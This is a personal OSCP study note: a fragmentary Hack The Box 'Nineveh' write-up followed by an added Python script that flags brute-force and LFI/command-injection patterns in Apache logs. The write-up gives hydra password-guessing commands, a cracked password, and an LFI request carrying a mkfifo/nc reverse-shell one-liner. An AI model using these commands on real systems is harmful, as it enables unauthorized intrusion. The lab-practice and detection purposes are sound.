OSCP Notes

HTB Write-up Nineveh

80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after: 2018-07-01T15:03:30
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
Port 80 returned nothing on its own, but after adding nineveh.htb to /etc/hosts I got content back and ran gobuster on the site.
Found a login page.
Possible usernames: admin, amrois.
MySQL is installed..?
Tried different sqlmap options but had no luck..?
Trying to crack it with hydra:
hydra -l admin -P ~/rockyou.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid" -t 54
password = 1q2w3e4r5t
HTTP admin page:
The notes page has an LFI vuln?
include(): it's executing the PHP code.
The cool trick below encodes the PHP source code so we can read it;
in this case it doesn't work.

HTTPS enum

After running gobuster, I found a phpLiteAdmin v1.9 login form.
Interesting warning:
Warning: rand() expects parameter 2 to be integer, float given in /var/www/ssl/db/index.php on line 114
hydra -l admin -P ~/rockyou.txt nineveh.htb https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:F=Incorrect"

Code execution on the site

Now we can execute commands.
Send it to Burp and modify the request to:
GET /department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+>/tmp/f
Got the reverse shell but not a TTY.
Cannot complete due to the slowness of the machine!
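From the defender's side, both of the moves in this write-up (the hydra password-guessing bursts against the two login forms, and the include()-based LFI that is then turned into command execution through a second query parameter) leave a clear footprint in the Apache access log. The Python script below is an added example written for these notes, not code from the box or the write-up's author: it parses combined-format access-log lines and flags (a) any source IP that POSTs to a login endpoint more than a threshold number of times and (b) any request whose include-style parameter points at an absolute path, a traversal sequence or a php:// wrapper, or whose cmd= parameter carries shell metacharacters. The log lines, the login-endpoint list, the parameter names and the threshold of 20 are all constructed assumptions for this example.

```python
"""Access-log triage for password guessing and LFI/RCE indicators.

Added example (not from the original write-up). All log lines, endpoint
names, parameter names and thresholds below are constructed assumptions.
"""
import re
from collections import Counter
from urllib.parse import parse_qs, urlparse

# Apache combined log format: ip ident user [timestamp] "METHOD path PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r"(?P<status>\d{3}) (?P<size>\S+)"
)

# Assumed login endpoints (the two forms attacked with hydra in the notes).
LOGIN_PATHS = {"/department/login.php", "/db/index.php"}
# Assumed threshold: more POSTs than this from one IP to a login form is a burst.
BRUTE_THRESHOLD = 20
# Assumed include-style parameter names; "notes" is the one from the write-up.
INCLUDE_PARAMS = {"notes", "page", "file", "include"}
SHELL_META = re.compile(r"[;|&`$]")  # characters a shell treats specially

# Constructed sample log: a hydra-like burst of 25 POSTs, one benign login,
# one benign notes request and one LFI + command-injection request.
SAMPLE_LOG = [
    f'10.10.14.5 - - [01/Jul/2017:15:10:{i:02d} +0000] "POST /department/login.php HTTP/1.1" 200 1510 "-" "Mozilla/4.0 (Hydra)"'
    for i in range(25)
] + [
    '10.10.14.9 - - [01/Jul/2017:15:11:40 +0000] "POST /department/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '10.10.14.9 - - [01/Jul/2017:15:12:01 +0000] "GET /department/manage.php?notes=files/ninevehNotes.txt HTTP/1.1" 200 980 "-" "Mozilla/5.0"',
    '10.10.14.5 - - [01/Jul/2017:15:13:07 +0000] "GET /department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=id%3bwhoami HTTP/1.1" 200 412 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Return a dict of the interesting fields, or None if the line is not a log entry."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def brute_force_sources(entries, threshold=BRUTE_THRESHOLD):
    """Map source IP -> number of POSTs to a login endpoint, for IPs at or over the threshold."""
    counts = Counter()
    for e in entries:
        if e["method"] == "POST" and urlparse(e["path"]).path in LOGIN_PATHS:
            counts[e["ip"]] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


def lfi_rce_indicators(entries):
    """List (ip, path, reasons) for requests whose query string looks like LFI or command injection."""
    findings = []
    for e in entries:
        url = urlparse(e["path"])
        qs = parse_qs(url.query, keep_blank_values=True)  # parse_qs already URL-decodes values
        reasons = []
        for param in INCLUDE_PARAMS & qs.keys():
            for value in qs[param]:
                if value.startswith("/") or "../" in value or value.startswith("php://"):
                    reasons.append(f"{param}= points outside the application: {value}")
        for value in qs.get("cmd", []):
            if SHELL_META.search(value):
                reasons.append(f"cmd= carries shell metacharacters: {value[:40]}")
        if reasons:
            findings.append((e["ip"], url.path, reasons))
    return findings


def analyse(lines):
    """Run both detections over raw log lines and return the combined report."""
    entries = [e for e in map(parse_line, lines) if e]
    return {
        "brute_force": brute_force_sources(entries),
        "lfi_rce": lfi_rce_indicators(entries),
    }


if __name__ == "__main__":
    report = analyse(SAMPLE_LOG)
    for ip, n in report["brute_force"].items():
        print(f"[brute-force] {ip}: {n} POSTs to a login form")
    for ip, path, reasons in report["lfi_rce"]:
        print(f"[lfi/rce] {ip} {path}: " + "; ".join(reasons))
```

The two rules are deliberately independent: a brute-force burst shows up even when every attempt returns 200 (the "Invalid" text the hydra command keys on is in the body, not the status line), and the LFI rule keys on the shape of the parameter value rather than on any particular file name, so a notes= value that names a relative file under the application is left alone while an absolute path, a traversal or a wrapper is reported.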